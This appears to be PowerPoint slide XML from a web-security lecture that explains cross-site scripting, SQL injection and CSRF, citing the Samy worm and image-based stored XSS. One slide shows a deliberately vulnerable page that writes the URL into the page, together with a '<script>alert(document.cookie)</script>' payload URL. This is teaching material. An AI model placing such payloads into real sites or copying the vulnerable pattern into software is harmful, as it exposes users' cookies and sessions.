                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>java\nscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="90000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>With careful javascript hacking:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Samy worm infects anyone who visits an infected MySpace page   …    and adds Samy as a friend.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Samy had millions of friends within 24 hours.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5715001" y="6467476"/>
            <a:ext cx="3019481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90000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://namb.la/popular/tech.html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Stored XSS using images</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27651" name="Rounded Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="2667000"/>
            <a:ext cx="4724400" cy="1905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endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27652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762000" y="1676400"/>
            <a:ext cx="8229600" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900"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400" smtClean="0"/>
              <a:t>Suppose   pic.jpg   on web server contains HTML !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> request for    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://site.com/pic.jpg    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>results in:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>			      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP/1.1  200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			      …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			      Content-Type:  image/jpeg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			      &lt;html&gt;  fooled ya   &lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>IE will render this as HTML    (despite Content-Type)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Consider photo sharing sites that support image uploads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>What if attacker uploads an “image” that is a script?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p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DOM-based XSS (no server used)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675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smtClean="0"/>
              <a:t>Example page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  &lt;HTML&gt;&lt;TITLE&gt;Welcome!&lt;/TITLE&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Hi &lt;SCRIPT&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var pos = document.URL.indexOf("name=") + 5; document.write(document.URL.substring(pos,document.URL.length));</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/SCRIPT&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/HTML&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Works fine with this URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  http://www.example.com/welcome.html?name=Joe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>But what about this one?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  http://www.example.com/welcome.html?name=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" smtClean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5486401" y="6467476"/>
            <a:ext cx="3013967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90000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Amit Klein ... XSS of the Third Kind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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="1524000"/>
            <a:ext cx="114300" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1126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smtClean="0"/>
              <a:t>Three top web site vulnerabilites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11268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dirty="0" smtClean="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser sends malicious input to server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad input checking leads to malicious SQL query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSRF – Cross-site request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad web site sends request to good web site, using credentials of an innocent victim who “visits” site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS – Cross-site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad web site sends innocent victim a script that steals information from an honest web site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2743200" y="2362200"/>
            <a:ext cx="3962400" cy="3259356"/>
            <a:chOff x="2743200" y="2035175"/>
            <a:chExt cx="3962400" cy="3259357"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="TextBox 5"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2743200" y="4648201"/>
              <a:ext cx="3962400" cy="64633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 smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Attacker’s malicious code executed on victim browser</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C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43200" y="3330575"/>
              <a:ext cx="3962400" cy="64633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 smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Attacker site forges request from victim browser to victim server</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C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43200" y="2035175"/>
              <a:ext cx="3962400" cy="64633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 smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Attacker’s malicious code executed on victim server</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="304800"/>
            <a:ext cx="8382000" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Basic scenario: reflected XSS attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12291" name="Picture 18" descr="toshiba_satellite_a105_s4284_lapto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601914"/>
            <a:ext cx="1436688" cy="143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11" descr="CompaqAlphaServerES4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59475" y="4979989"/>
            <a:ext cx="1155700" cy="142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4" descr="DS15serverfron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4188" y="1905000"/>
            <a:ext cx="2436812" cy="846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5943601" y="1524000"/>
            <a:ext cx="14261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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12295" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="4552949"/>
            <a:ext cx="14877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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victim Server </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12296" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2046288" y="1920875"/>
            <a:ext cx="3211512" cy="6873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2297" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228601" y="3886200"/>
            <a:ext cx="13495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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victim client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12298" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="3097303" y="1748908"/>
            <a:ext cx="13999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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>visit web site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12299" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2046288" y="2303463"/>
            <a:ext cx="3440112" cy="77311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2300" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="2785888" y="2285484"/>
            <a:ext cx="21831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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>receive malicious link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12301" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2274888" y="3962400"/>
            <a:ext cx="2830512" cy="99060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2302" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3049590" y="4085708"/>
            <a:ext cx="16541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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>click on link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12303" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2319340" y="4536559"/>
            <a:ext cx="26384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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo user input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12304" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="1949451"/>
            <a:ext cx="365125" cy="365125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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12305" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209802" y="2606675"/>
            <a:ext cx="365125" cy="365125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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12306" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2714627" y="3705226"/>
            <a:ext cx="365125" cy="365125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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12307" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="4324349"/>
            <a:ext cx="3352800" cy="1162051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 type="arrow" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12308" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2198688" y="2894013"/>
            <a:ext cx="3211512" cy="687387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2309" name="TextBox 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="3028295" y="2764908"/>
            <a:ext cx="19412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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>send valuable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12310" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514602" y="3048000"/>
            <a:ext cx="365125" cy="365125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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12311" name="Oval 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2028827" y="4006851"/>
            <a:ext cx="365125" cy="365125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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill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XSS example: vulnerable site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133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8305800" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>search field on victim.com:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://victim.com/search.php ? term = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>apple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Server-side implementation of  </a:t>
            </a:r>
            <a:r>
